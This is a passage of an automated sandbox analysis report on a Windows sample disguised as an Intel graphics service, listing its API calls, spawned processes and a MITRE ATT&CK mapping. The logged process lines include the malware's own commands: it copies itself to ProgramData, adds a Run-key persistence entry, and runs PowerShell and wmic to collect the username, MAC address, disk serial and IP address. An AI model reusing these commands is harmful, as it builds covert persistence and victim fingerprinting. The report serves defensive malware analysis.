Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012D1195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012A40F0 GetProcessHeap,__Init_thread_footer,__Init_thread_footer,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012DAF0E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012D2B5D mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 5_2_002C2B5D mov eax, dword ptr fs:[00000030h]
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 5_2_002CAF0E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012D1195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012C46CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 5_2_002B4F68 SetUnhandledExceptionFilter,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 5_2_002C1195 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 5_2_002B46CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: 5_2_002B4DD5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

Encrypted powershell cmdline option found
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: Base64 decoded [B> j^6jm&Z"}+"qfyRzmb'rb}#6i,jzjlm
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: Base64 decoded [B> j^6jm&Z"}+"qfyRzmb'rb}#6i,jzjlm
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" copy 'C:\Users\user\Desktop\IGFXCUISERVICE.exe' 'C:\ProgramData\SystemData\igfxCUIService.exe'
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Process created: C:\ProgramData\SystemData\igfxCUIService.exe "C:\ProgramData\SystemData\igfxCUIService.exe"
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" getmac | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps1.txt' ; wmic path win32_physicalmedia get SerialNumber | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\temps2.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $env:username | Out-File -Encoding 'Default' 'C:\ProgramData\SystemData\tempu.txt'
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic OS get Caption, CSDVersion, OSArchitecture, Version / value > "C:\ProgramData\SystemData\tempo1.txt" && type "C:\ProgramData\SystemData\tempo1.txt" > "C:\ProgramData\SystemData\tempo2.txt
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c wmic nicconfig where 'IPEnabled = True' get ipaddress > "C:\ProgramData\SystemData\tempi1.txt" && type "C:\ProgramData\SystemData\tempi1.txt" > "C:\ProgramData\SystemData\tempi2.txt
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\getmac.exe C:\Windows\system32\getmac.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe "C:\Windows\System32\Wbem\WMIC.exe" path win32_physicalmedia get SerialNumber
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic OS get Caption, CSDVersion, OSArchitecture, Version / value
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic nicconfig where 'IPEnabled = True' get ipaddress
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V igfxCUIService /t REG_SZ /D "C:\ProgramData\SystemData\igfxCUIService.exe" /F
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: igfxCUIService.exe, 00000005.00000002.956989647.00000000018B0000.00000002.00020000.sdmp, igfxCUIService.exe, 00000020.00000002.956990102.0000000001A50000.00000002.00020000.sdmp, igfxCUIService.exe, 00000024.00000002.956939502.00000000019A0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetACP,IsValidCodePage,GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: EnumSystemLocalesW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetLocaleInfoW,
Source: C:\ProgramData\SystemData\igfxCUIService.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012C48C6 cpuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_080942C4 CreateNamedPipeW,
Source: C:\Users\user\Desktop\IGFXCUISERVICE.exe | Code function: 1_2_012C529D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (2) | Application Shimming (1) | Application Shimming (1) | Deobfuscate/Decode Files or Information (11) | Input Capture (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Command and Scripting Interpreter (112) | Registry Run Keys / Startup Folder (1) | Process Injection (13) | Obfuscated Files or Information (2) | LSASS Memory | File and Directory Discovery (2) | Remote Desktop Protocol | Input Capture (1) | Exfiltration Over Bluetooth | Encrypted Channel (11) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | PowerShell (2) | Logon Script (Windows) | Registry Run Keys / Startup Folder (1) | Masquerading (1) | Security Account Manager | System Information Discovery (32) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Modify Registry (1) | NTDS | Query Registry (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (4) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (121) | LSA Secrets | Security Software Discovery (221) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection (13) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Virtualization/Sandbox Evasion (121) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
(The number in parentheses after a technique is the count of report signatures mapped to it.)

Behavior Graph

